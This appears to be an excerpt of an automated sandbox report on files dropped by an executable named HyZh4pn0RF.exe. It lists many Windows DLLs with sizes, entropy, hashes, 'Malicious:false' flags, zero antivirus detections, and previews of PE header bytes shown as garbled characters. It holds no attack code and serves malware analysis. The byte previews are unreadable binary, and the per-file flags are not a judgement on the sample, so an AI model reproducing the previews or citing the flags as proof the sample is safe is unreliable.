                                                                                                                                                                                                                                                                                                SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.235115741550938
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                                                                                                                                                                                MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                                                                                                                                                                                SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                                                                                                                                                                                SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                                                                                                                                                                                SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):15360
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.133714807569085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                                                                                                                                                                                MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                                                                                                                                                                                SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                                                                                                                                                                                SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                                                                                                                                                                                SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.928082706906375
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                                                                                                                                                                                MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                                                                                                                                                                                SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                                                                                                                                                                                SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                                                                                                                                                                                SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.799063285091512
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                                                                                                                                                                                MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                                                                                                                                                                                SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                                                                                                                                                                                SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                                                                                                                                                                                SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):754688
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.624959985050181
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                                                                                                                MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                                                                                                                SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                                                                                                                SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                                                                                                                SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27648
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.792654050660321
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                                                                                                                MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                                                                                                                SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                                                                                                                SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                                                                                                                SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):67072
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.060461288575063
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                                                                                                                MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                                                                                                                SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                                                                                                                                                                                SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                                                                                                                SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.488437566846231
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                                                                                                                MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                                                                                                                SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                                                                                                                SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                                                                                                                SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.730605326965181
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                                                                                                                MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                                                                                                                SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                                                                                                                SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                                                                                                                SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.685843290341897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                                                                                                                MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                                                                                                                SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                                                                                                                SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                                                                                                                SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):119192
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                                                                                MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                                                                                SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                                                                                SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                                                                                SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49528
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                                                                                MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                                                                                SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                                                                                SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                                                                                SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):71448
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.247581706260346
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:rRaPPkDN3nkiP6djtX5IkTIL1yUvGJtIAOnT7SyqWx5:9anmN3nkikjV5IkTIL1yUuJtIAOnTgi
                                                                                                                                                                                                                                                                                                MD5:209CBCB4E1A16AA39466A6119322343C
                                                                                                                                                                                                                                                                                                SHA1:CDCCE6B64EBF11FECFF739CBC57E7A98D6620801
                                                                                                                                                                                                                                                                                                SHA-256:F7069734D5174F54E89B88D717133BFF6A41B01E57F79957AB3F02DAA583F9E2
                                                                                                                                                                                                                                                                                                SHA-512:5BBC4EDE01729E628260CF39DF5809624EAE795FD7D51A1ED770ED54663955674593A97B78F66DBF6AE268186273840806ED06D6F7877444D32FDCA031A9F0DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.T.S...S...S...+r..S...,...S...,...S...,...S...,...S..$....S..U+...S...S...S..$....S..$....S..$....S..$....S..Rich.S..........PE..d......e.........." ...%.f................................................... ......')....`.............................................P......d......................../..............T...........................@...@............................................text...=d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):84760
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5874715807724025
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RS7z7Sj2u5in5IVfC83zYxzbdK87kW1IACVw7SyrxX:I7z+jum3MJdN7kW1IACVwX
                                                                                                                                                                                                                                                                                                MD5:59D60A559C23202BEB622021AF29E8A9
                                                                                                                                                                                                                                                                                                SHA1:A405F23916833F1B882F37BDBBA2DD799F93EA32
                                                                                                                                                                                                                                                                                                SHA-256:706D4A0C26DD454538926CBB2FF6C64257C3D9BD48C956F7CABD6DEF36FFD13E
                                                                                                                                                                                                                                                                                                SHA-512:2F60E79603CF456B2A14B8254CEC75CE8BE0A28D55A874D4FB23D92D63BBE781ED823AB0F4D13A23DC60C4DF505CBF1DBE1A0A2049B02E4BDEC8D374898002B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R...S..R.....R...W..R...V..R...Q..R...S..R..S..R..S..R..._..R...R..R......R...P..R.Rich.R.........................PE..d......e.........." ...%.....^......|........................................P......-B....`.............................................H............0....... ..,......../...@..........T...........................p...@............................................text...k........................... ..`.rdata..p>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):182784
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.193615170968096
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                                                                                                                                                                                                                                                                                MD5:0572B13646141D0B1A5718E35549577C
                                                                                                                                                                                                                                                                                                SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                                                                                                                                                                                                                                                                                SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                                                                                                                                                                                                                                                                                SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
